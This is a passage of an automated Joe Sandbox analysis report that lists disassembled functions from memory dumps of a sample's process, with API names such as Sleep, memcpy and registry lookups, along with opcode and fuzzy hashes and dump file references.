                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 3ef084da799f0a33023c652117027e69e8e15d24725d31172a4b0d0595537e04
                                                                                                                                                  • Instruction ID: ce2401481d2fc149593c84d06ba7031b2549e4e5465f5b3b382b54af925bbccc
                                                                                                                                                  • Opcode Fuzzy Hash: 3ef084da799f0a33023c652117027e69e8e15d24725d31172a4b0d0595537e04
                                                                                                                                                  • Instruction Fuzzy Hash: 9CF02B2260830A42E5529F88F8413B97344BF847E4F080137DF4D466D1DF3DD985C300
                                                                                                                                                  Function 00007FF8BFB8D96E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 7b4dabeff1d3f2b3154452b78c37af8fb2a924e4141310c203bccd55459aa073
                                                                                                                                                  • Instruction ID: 3c4d095f3d8c9005d2e9ac2234a5357b54c78f9a33c32730250a648b2c0292d4
                                                                                                                                                  • Opcode Fuzzy Hash: 7b4dabeff1d3f2b3154452b78c37af8fb2a924e4141310c203bccd55459aa073
                                                                                                                                                  • Instruction Fuzzy Hash: 66F0F62260820A42E5529F88F8413B97344BF847E4F080136DF4D46691DF2DD985C300
                                                                                                                                                  Function 00007FF8BA4F184A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1125407320-0
                                                                                                                                                  • Opcode ID: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
                                                                                                                                                  • Instruction ID: a214a89aa3aa68b767981fce7a8c01b72e9dcd555da6b1c3cdaab1a0710540b2
                                                                                                                                                  • Opcode Fuzzy Hash: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
                                                                                                                                                  • Instruction Fuzzy Hash: 9C313E20E0C70782F6305BADEC942786251AF463F0F5453B6DF7E466E1DE2EA649D680
                                                                                                                                                  Function 00007FF8B915184A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1125407320-0
                                                                                                                                                  • Opcode ID: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
                                                                                                                                                  • Instruction ID: 3b5380edf9031800730bb6fd5d6ffaf9694a42cf0b797924d49445e63259c68a
                                                                                                                                                  • Opcode Fuzzy Hash: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
                                                                                                                                                  • Instruction Fuzzy Hash: B8312B25E0868392F6325FACE8942782251AF443F0F214735DB7D466E5CE2CF98AF640
                                                                                                                                                  Function 00007FF8B918EF2A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1125407320-0
                                                                                                                                                  • Opcode ID: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
                                                                                                                                                  • Instruction ID: 0d92a77e8aa1d7bbe763f043219c3183562da79cfec2b515fd25baf78f50a1ac
                                                                                                                                                  • Opcode Fuzzy Hash: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
                                                                                                                                                  • Instruction Fuzzy Hash: 30312120E1C68283F630AF2CE8C52792652AF457F0F650331EB7D566E3DE2DA9467781
                                                                                                                                                  Function 00007FF8BFB5364A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1125407320-0
                                                                                                                                                  • Opcode ID: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
                                                                                                                                                  • Instruction ID: 9379432b5bc0e6ab582c44bcf956020c76fd09851529afa3726c9ddb959def9e
                                                                                                                                                  • Opcode Fuzzy Hash: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
                                                                                                                                                  • Instruction Fuzzy Hash: 1B315962E0C64292FA609BECE8A52787352AF447F0F18033AD77D067E1DE2CF555A650
                                                                                                                                                  Function 00007FF8BFB89B0A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1125407320-0
                                                                                                                                                  • Opcode ID: 1b707f5b76f673626582b9472a17c46eb626fd6209ef41941f1a1b7c5a8a998a
                                                                                                                                                  • Instruction ID: c6bc02626b61f004f88f23012105a7d6373844b016c3c864ea471cb8de1c5aaf
                                                                                                                                                  • Opcode Fuzzy Hash: 1b707f5b76f673626582b9472a17c46eb626fd6209ef41941f1a1b7c5a8a998a
                                                                                                                                                  • Instruction Fuzzy Hash: 0E315C25E0D75B82FA6097EDE8882782355AFC1BF4F144331D77E46AE2DE2DA841D600
                                                                                                                                                  Function 00007FF6BE03886D Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00007FF6BE031360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6BE0384AF), ref: 00007FF6BE03137E
                                                                                                                                                  • SleepEx.KERNEL32 ref: 00007FF6BE0388DC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModuleSleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1071907932-0
                                                                                                                                                  • Opcode ID: ebcfc3099e72364c31fa6fcd18c915c859bbb365beea9433ade7ab1f37a8b2e3
                                                                                                                                                  • Instruction ID: a3e9e94015ba8e971605898b0e60413f8aff8fad3f4eb5b1cbabede9be92208d
                                                                                                                                                  • Opcode Fuzzy Hash: ebcfc3099e72364c31fa6fcd18c915c859bbb365beea9433ade7ab1f37a8b2e3
                                                                                                                                                  • Instruction Fuzzy Hash: 6E01A422B1C64392F7B15718E450BBA22A1EBAC384F540070F70ECBBD5EE6CE965D360
                                                                                                                                                  Function 00007FF6BE032989 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  • Opcode ID: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
                                                                                                                                                  • Instruction ID: ae871da1da499783c0e851cf84f3d36887d7ea1900ae3c91acf3a577669ff835
                                                                                                                                                  • Opcode Fuzzy Hash: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
                                                                                                                                                  • Instruction Fuzzy Hash: 03E0DF41B2829303FA70496D1040F3506822F7C388F165830EF0EE62EADD3EE4220800
                                                                                                                                                  Function 00007FF6BE032990 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  • Opcode ID: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
                                                                                                                                                  • Instruction ID: 7bea1511188c1834aaedc09f566207b690dd49adcab1abf1c7cc80eee3d2e3d4
                                                                                                                                                  • Opcode Fuzzy Hash: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
                                                                                                                                                  • Instruction Fuzzy Hash: 75E04F41B2869303FA74496D1540F7606926F7D788F165831EF0EE66EADD3EE4625800
                                                                                                                                                  Function 00007FF6BE032982 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  • Opcode ID: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
                                                                                                                                                  • Instruction ID: 80c2ecf1bd7b7d9b8c530c20d9ba195492c7dab0b6d192278a2b949ac31730ac
                                                                                                                                                  • Opcode Fuzzy Hash: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
                                                                                                                                                  • Instruction Fuzzy Hash: 61E04F41B2869303FA74496D5540F7506927F7D784F165831EF0EE66EADD3EE4625800
                                                                                                                                                  Function 00007FF6BE032997 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  • Opcode ID: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
                                                                                                                                                  • Instruction ID: 5047c9a687a6a10307323a37f911406188e53d86d79999c42ad929f5bd4b4dd4
                                                                                                                                                  • Opcode Fuzzy Hash: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
                                                                                                                                                  • Instruction Fuzzy Hash: 74E04F41B2869303FA74496D5540F7506926F7D788F165831EF0EE66EADE3EE4625800
                                                                                                                                                  Function 00007FF6BE03299E Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  • Opcode ID: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
                                                                                                                                                  • Instruction ID: a2a5f377581ae43633a8c065204ae5726e21cf9e29637e663a4544bb63d7892b
                                                                                                                                                  • Opcode Fuzzy Hash: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
                                                                                                                                                  • Instruction Fuzzy Hash: 37E04F41B2869303FA7449AD1540F7506926F7D788F165831EF0EE66EADD3EE4625800
                                                                                                                                                  Function 00007FF6BE0329FE Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heap$FreeProcessfclosefread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4240746492-0
                                                                                                                                                  • Opcode ID: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
                                                                                                                                                  • Instruction ID: 4c61293dba1c70e36329c5365de070c2fca33edcf8843dec4ca5032dae75259f
                                                                                                                                                  • Opcode Fuzzy Hash: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
                                                                                                                                                  • Instruction Fuzzy Hash: 97E0DF01B2828203FA7049AE2440F3506826F7C388F165831EF0EE62EACD3EE4220800
                                                                                                                                                  Function 00007FF6BE0381E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ServiceStatus
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3969395364-0
                                                                                                                                                  • Opcode ID: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
                                                                                                                                                  • Instruction ID: 7c90a9bd2b75c2c7c210778fb8323c47bc095dcd4787dafc285b9599e8a76f00
                                                                                                                                                  • Opcode Fuzzy Hash: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
                                                                                                                                                  • Instruction Fuzzy Hash: 7FD06775D1960285E7149F4DEA85A642670BBBD741B909436E30C92230DE2C6175A700
                                                                                                                                                  Function 00007FF6BE0376D2 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
